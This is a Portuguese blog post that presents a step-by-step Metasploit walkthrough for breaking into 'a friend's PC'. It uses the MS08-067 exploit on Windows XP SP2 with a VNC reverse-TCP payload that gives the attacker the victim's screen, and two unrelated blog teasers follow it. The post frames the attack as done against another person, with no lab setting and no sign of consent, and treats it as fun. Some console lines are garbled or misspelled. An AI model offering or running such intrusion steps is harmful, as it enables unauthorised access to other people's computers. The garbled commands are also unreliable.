Pular para o conteúdo principal

Metasploit: entrando no PC de um amigo.

Só vou falar aqui o que tem em tantos outros site e até mesmo no YouTube. Vou simular um teste de invasão ao Windows XP SP2, usando o Linux, com o framework Metasploit.

Metasploit: É um framework para desenvolvimento e testes de Exploit, ele tem ferramentas para coleta de informações, e testes de penetração.

Para quem não sabe exploit é um programa, que se aproveita das vulnerabilidades de um sistema computacional, como o próprio Sistema Operacional ou serviços de integração de protocolos, como FTP, HTTP e qualquer outro serviço de rede.

Para fazer esse teste você precisa de ter o Metasploit instalado, se você usa Windows, segue aquele padrão Next Next Finish, mas se esta no Linux, Leia isso, além disso instale um Cliente VNC, recomendo o vncviewer, depois de ter todos as ferramentas ai, vamos a pratica.

A primeira coisa a fazer é ter o IP da pessoa, se a pessoa estiver na sua rede é fácil, passe um scanner e pronto, mas se estiver através da Internet vai precisar fazer melhor, mas não vou abortar essa parte, na Internet tem muita coisa falando sobre isso.
Bom, eu só testei essa técnica com o XP SP2, mas se quiserem se arriscar em outros, fiquem a vontade.

Agora, a primeira coisa a fazer é abrir o msfconsole, no Linux só digitar no terminal, msfconsole mesmo. No Windows tem um Ícone no Desktop.

Entendendo como está aqui.

Estou usando o Linux Ubuntu, com as ferramentas já instaladas, o meu IP é: 192.168.2.100, o IP da minha maquina alvo é: 192.168.2.101

O terminal deve estar assim:

msf >

Digitem show exlpoits, e copie esse item.

windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption

agora digite:

use windows/smb/ms08_067_netapi

agora digite: show payloads

Selecione esse item windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager


feito isso aplique o comando:

set PAYLOAD windows/vncinject/reverse_tcp

agora ficou facil,

show options

set RHOST 192.168.2.101 ( Ou o ip da maquina alvo)
set LHOST 192.168.2.100 ( Seu IP )
set TARGET 0 ( com isso ele não precisa especificar o SO )

Basicamente ficaria assim:
msf > windows/smb/use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > use windows/vncinject/revset RHOST 192.168.2.101
RHOST => 192.168.2.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.2.100
LHOST => 192.168.2.100
msf exploit(ms08_067_netapi) > set TAGET 0
TAGET => 0

Se fez tudo isso, digite o comando.

exploit

deve demorar um porco e abrir um tela do computador da pessoa.
Agora só diversão :p

Ótimo video mostrando como funciona.


Se quiserem mais detalhes clique aqui.

Postagens mais visitadas deste blog

Criando um sistema de login em Java.

Login Pessoal, nesse exemplo vou demonstrar como criar um sistema de login em Java, usando servlet , jsp , e html. A IDE usada será o Netbeans , Bom a primeira coisa a ser feita é criar um projeto web pelo NetBeans . Para isso, siga os seguintes passos. Menu     File → New Project Agora clique em Java Web, depois aplicação WEB. Agora clique em Next . Coloque um nome para sua aplicação WEB, e clique em finish . Novamente clique em Next . Feito isso, agora vamos criar o formulário para que o usuário entre com o Login e a senha. Formário HTML <%@page contentType="text/html" pageEncoding="UTF-8"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"    "http://www.w3.org/TR/html4/loose.dtd"> <html>     <head>         <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">         <titl...

Problema de charset OTRS

Tive um problema com apache e OTRS, nosso banco ORACLE estava no charset iso-8859-1. Foi necessário jogar essas linhas no arquivos /etc/init.d/httpd LANG='AMERICAN_AMERICA.WE8ISO8859P1'; export LANG NLS_LANG='AMERICAN_AMERICA.WE8ISO8859P1'; export NLS_LANG NLS_NUMERIC_CHARACTERS=,.; export NLS_NUMERIC_CHARACTERS Feito isso de um restart no apache service httpd restart Com isso deve resolver o problema.